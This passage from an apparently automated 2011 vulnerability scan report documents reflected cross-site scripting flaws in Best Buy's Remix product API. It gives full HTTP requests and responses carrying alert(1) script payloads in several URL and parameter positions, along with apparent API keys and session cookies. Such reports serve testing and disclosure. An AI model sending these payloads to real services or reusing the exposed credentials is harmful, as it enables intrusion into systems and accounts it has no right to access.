Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'PRPT','page':'Back%20to%20School','searchLastPage':'Back%20to%20School','lastCatId':'pcmcat245300050005','lid':'bts_FO7','tab':'["www.bestbuy.com/site/olstemplatemapper.jsp%3F_dyncharset%3DISO-8859-1%26id%3Dpcat17071%26type%3Dpage%26ks%3D960%26st%3D8412292%252C+1257903%252C+2077114%252C+9984558%252C+2044283%252C+1211393_%26sc%3DGlobal%26cp%3D1%26sp%3D%26qp%3Dq383431323239322c20313235373930332c20323037373131342c20393938343535382c20323034343238332c20313231313339335f%7E%7Ecpcmcat242800050021%2523%25231%2523%25236%7E%7Encabcat0915000%2523%25232%2523%25236%26list%3Dy%26usc%3DAll+Categories%26nrp%3D15%26iht%3Dn"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DBack%252520to%252520School%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.bestbuy.com%25252Fsite%25252Folstemplatemapper.jsp%25253F_dyncharset%25253DISO-8859-1%252526id%25253Dpcat17071%252526type%25253Dpage%252526k_4%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2FMisc%2FBack-to-School%2Fpcmcat245300050005.c%22%2C%22pv%22%3A1%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A1%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%7D%2C%22f%22%3A1313106400684%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; fsr.a=1313106408894

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "c8a1aaf1166b56e42431a4111d6f647a"
X-Runtime: 3
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2388
Date: Thu, 11 Aug 2011 23:47:17 GMT

SDSTATIC({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<YourApiKey> : 8880044, a
...[SNIP]...
89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(digitalSku>\"\"&sku in(8412292,1211393,9984558,2044283,2077114,1257903))?dsku=true&show=sku,digitalSku7bf34<script>alert(1)</script>10daab6be&apiKey=tfuyteqkrnxfp3ye6kvpvk5e&callback=SDSTATIC&pageSize=99&format=json'",
"status": "400 Bad Request"
}
})

4.10. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bbyremix.bestbuy.com
Path:	/v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7c06e<script>alert(1)</script>0dcbfca45d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v17c06e<script>alert(1)</script>0dcbfca45d0/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web1.ATL
Etag: "4748658f3be8e8a60938f067866e228d"
X-Runtime: 1
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2456
Date: Thu, 11 Aug 2011 23:50:22 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v17c06e<script>alert(1)</script>0dcbfca45d0/products(sku in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoad
...[SNIP]...

4.11. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bbyremix.bestbuy.com
Path:	/v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 820c8<script>alert(1)</script>201fb407b6d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)820c8<script>alert(1)</script>201fb407b6d&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web3.ATL
Etag: "db87ee437c972e7c7b84f17d46703a82"
X-Runtime: 2
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2456
Date: Thu, 11 Aug 2011 23:50:25 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
<YourApiKey> : All stores within 10 miles of the latitude 38.89 and longitude -77.03"
],
"code": 400,
"message": "Couldn't understand '/v1/products(sku in(8412292)820c8<script>alert(1)</script>201fb407b6d&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&forma
...[SNIP]...

4.12. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bbyremix.bestbuy.com
Path:	/v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 564de<script>alert(1)</script>39279c9f405 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs564de<script>alert(1)</script>39279c9f405&pageSize=99&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web2.ATL
Etag: "7e4ec97c16be3ce5d171449ceacb15d0"
X-Runtime: 35
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 485
Date: Thu, 11 Aug 2011 23:50:11 GMT

busopsLow.BTP.retLoadBTPSKUs564de<script>alert(1)</script>39279c9f405({
"queryTime": "0.005",
"currentPage": 1,
"totalPages": 0,
"partial": false,
"from": 1,
"total": 0,
"to": 0,
"products": [

],
"canonicalUrl": "/v1/products(sku in(8412292)&(depart
...[SNIP]...

4.13. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bbyremix.bestbuy.com
Path:	/v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 82b98<script>alert(1)</script>79e8fa433a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json&82b98<script>alert(1)</script>79e8fa433a0=1 HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
Cookie: TLTSID=DA162D90C47310C46E489EF22AB313E6; groupabcd=b; groupabcde=c; newgroup3=a; newgroup2=b; newgroup=a; group2=a; group=a; DYN_USER_CONFIRM=8ebafb8ac84930570880799ec8058003; DYN_USER_ID=ATG12715437407; JSESSIONID=9974DE521797768FD85C043843E09A44.bbolsp-app01-48; TLTUID=DA162D90C47310C46E489EF22AB313E6; track={'lastPage':'SRCL','page':'Search%20Results','searchLastPage':'Search%20Results','lastCatId':'pcat17071','lid':'Add+To+Cart','tab':'["ipt%3AfnAddToCartFromSearch%28%271181831568242%27%2C%278412292%27%2C%271%27%29"]'}; s_cc=true; s_sq=bbymainprod%3D%2526pid%253DSearch%252520Results%2526pidt%253D1%2526oid%253Djavascript%25253AfnAddToCartFromSearch('1181831568242'%25252C'8412292'%25252C'1')_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221313106328259_291120%22%2C%22ru%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22r%22%3A%22www.fakereferrerdominator.com%22%2C%22st%22%3A%22%22%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.bestbuy.com%2Fsite%2Folstemplatemapper.jsp%22%2C%22pv%22%3A2%2C%22lc%22%3A%7B%22d3%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A3%2C%22sd%22%3A3%2C%22cp%22%3A%7B%22orderDate%22%3A%2208%2F11%2F2011%22%2C%22TLSessionID%22%3A%22DA162D90C47310C46E489EF22AB313E6%22%2C%22bbyKeyWords%22%3A%22na%22%2C%22CartProds%22%3A%228412292%2C1211393%2C9984558%2C2044283%2C2077114%2C1257903%22%7D%2C%22f%22%3A1313106572865%7D; s_vi=[CS]v1|272234B3851D0894-40000144C060C985[CE]; ci_IcsCsid=; CART=H4sIAAAAAAAAAJVTy27TQBS9SZu+G9pGLJEqPsBt0gcpLFBIHwTSJpCiStmgiX2TDJ2HOx6HmAUCiT1rBPwBm34FG9gg8RmwYceKGddOUyQWeGFZx+eee86duZ9+QC5QcNuV3OlgoDth5Hi0RzUqRRyDclQuOlJ5qBxfSReDQCqnKuUpxYZFV3+9f/vl/On9LEzUYYVXk5KaRl4TXRloWKo/IwOyFmrK1uo00HfqkOcNZbqIRjfW0LBywWFE9NZaWlHRM6wcP458PIOXkB36xmXBchyr41SMvciKDV9/u/HuM/k4AZkaTAb0BQ59AMg8nzTvOVN097+jXQ1wHg633zQ2+1m4WYP5LuGURS08O5JtmKLNvhRYgzyjAg0YonDxSO6afFUpTIxOqLHCdRtm+AHt6sOgZz+bVLv9mngAs/xRSISmOqrDdbdPmfd3dxs+U4cldwwfDaUOc65tQ1xd8xKk4OGAuriPRIcKK54nRZCILCAnlBlImaQJfeEU0d8bmkGakSfYPK8STZjsPcQogRZT6DF2R62m+J4VTK3wfaoCfUQ4jnRs5jhJWrJwMQbTn/Su0pixMKJNXFbk02lV3LGUc7yppBeOIdd4q09936Q4RN2XKTzDW1oqHJM7Ieb4hY5amujUwgo/UQYaH34a3DdXsiFY1FRmqlfv6a4MOwzNPZ21pJhgq6ZNVwuMHVM+QGVPpaKQtKmfWg6M42MZG9xnpKehMKZ+T0qGRBj5QuCjSwnbRUYHqCLLTSSWkl/xFqX4TLwB/3gyfvxoyKF4+qSlYbq8WSyVdkoJnHfpxs7O1q3N9fX1cqlskMVisVwsbxS3tsulzZKGqQMlQ+FpgAsps2PL8WJa205i++uqevX9w++fWci0ITcgLLR7abp2CQvisSwPTW8PuyRk+vLrD2JlK3iQBAAA; CART_CONFIRM=4a66d5aabc3c209fdefc00f9c01a96aa; fsr.a=1313106576228

Response

HTTP/1.1 200 OK
X-Mashery-Responder: mashery-web3.ATL
Etag: "7f4e0f2b8eda632249293d791be5f98f"
X-Runtime: 4
Content-Type: application/x-javascript; charset=UTF-8
Cache-Control: private, max-age=0, must-revalidate
Connection: close
Server: thin 1.2.11 codename Bat-Shit Crazy
Accept-Ranges: bytes
Content-Length: 2459
Date: Thu, 11 Aug 2011 23:50:19 GMT

busopsLow.BTP.retLoadBTPSKUs({
"error": {
"examples": [
"/v1/products/8880044.xml?apiKey=<YourApiKey> : Get product with sku 8880044, as xml",
"/v1/products/8880044.json?apiKey=<Your
...[SNIP]...
tmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99&format=json&82b98<script>alert(1)</script>79e8fa433a0=1'",
"status": "400 Bad Request"
}
})

4.14. http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [pageSize parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bbyremix.bestbuy.com
Path:	/v1/products(sku%20in(8412292)&(departmentId=3))

Issue detail

The value of the pageSize request parameter is copied into the HTML document as plain text between tags. The payload d5e64<script>alert(1)</script>484527ebd4e was submitted in the pageSize parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/products(sku%20in(8412292)&(departmentId=3))?show=name,modelNumber,image,categoryPath.id,protectionPlans.sku,sku,productId,buybackPlans.sku&apiKey=enzhw37pqtq5pup8wex2x55a&callback=busopsLow.BTP.retLoadBTPSKUs&pageSize=99d5e64<script>alert(1)</script>484527ebd4e&format=json HTTP/1.1
Host: api.bbyremix.bestbuy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.bestbuy.com/site/olspage.jsp?id=pcat17005&type=page&st=8412292%2C+1257903%2C+2077114%2C+9984558%2C+2044283%2C+1211393_&cp=1&_requestid=38491
